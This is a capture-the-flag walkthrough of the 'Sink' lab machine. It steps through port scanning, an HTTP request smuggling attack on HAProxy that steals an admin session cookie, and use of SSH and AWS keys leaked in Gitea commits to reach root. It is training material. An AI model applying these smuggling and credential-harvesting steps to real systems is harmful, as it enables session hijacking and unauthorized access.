Sink

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.225 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,3000,5000 10.10.10.225 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
There are two websites hosted in the server. The one on port 3000 is a Gitea 1.12.6 server.

The other one on port 5000 shows a login page.

Let's register a new user on this last website.

Once logged in, we'll see a Sink DevOps page.

Exploitation
If we take a look at the response headers, we'll the Via: haproxy header.
curl http://10.10.10.225:5000 -I
This is a type of proxy which is vulnerable to HTTP request smuggling or HTTP Desync attacks as we can see here. Let's test it out. On the main page, we could leave a comment.

Intercept the request with BurpSuite, and remove unnecessary request headers.

The vulnerability occurs when the Transfer-Enconding header is sent together with a vertical tab. To insert the vertical tab into the BurpSuite request, echo and base64 encode it.
echo '\x0b' | base64
Then, add the Transfer-Enconding header together with the base64 encoded vertical tab, and base64 decode it with the decoder built-in tool from BurpSuite. We can show non-printable characters to make it more comfortable. Then, we will have to copy and paste the same request above and increment the Content-Length header.

Now, there are two new comments, and the second one has a session cookie different from ours.

Let's change it with the EditThisCookie extension.

If we reload the website, we'll see that we have become admin@sink.htb the user.

Inside the Notes section, we'll see three notes.

The three of them have credentials.



Back to the Gitea server, we'll see that it has a login page. And the credentials for the root user are the only valid ones.

There are four repositories inside.

The Key_Management repository is owned by marcus.

There are a few commits in the repository.

The Preparing for Prod commit shows an SSH private key in the hidden file .keys/dev_keys.

The .keys/dev_keys contains the private SSH key.

Let's copy it into the id_rsa file, and give it the right permissions. Then, log in as marcus, and we'll be able to grab the user flag.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa marcus@10.10.10.225
Privilege Escalation
Back to the Gitea server repositories, the Log_Management repository also has a bunch of commits.

The dev push for log group and stream creation commit contains private keys for AWS.

Using these keys, we could try to list AWS secrets. But first, we need to configure AWS with these keys.
aws configure
Now, as seen below, there are secrets we can access.
aws --endpoint-url="http://127.0.0.1:4566" secretsmanager list-secrets
We can make a script like the following, which will take the ARN of each secret, and list its content.
nano /tmp/get_secrets.sh
If we run the script, we'll see that each secret has new credentials stored in it.
bash /tmp/get_secrets.sh
The credentials for david are the only ones that work.
su david
There is one directory called Projects in his home directory.
ls -l
This folder contains a file which is encrypted.
ls -lR
We can try to decrypt the file with AWS. But first, we need to reconfigure AWS again.
aws configure
The following script will take each key stored with aws kms, and it will try to decrypt the servers.enc file using one of the possible encryption algorithms.
nano
Run the script, and we'll get a base64 string.
bash /tmp/get_keys.sh
If we take the string, decode it, and put it in a file called content, we'll see that it is a compressed file.
echo 'H4...AAA=' | base64 -d > content
file content
Let's decompress it.
mv content content.gz
gunzip content.gz
tar xf content
It has the servers.sig servers.yml files. The servers.yml file contains credentials.
cat servers.yml
These credentials are valid for the root user. So finally, get a shell as root, and then all we have to do is reap the harvest and take the root flag.
su root
Last updated
Was this helpful?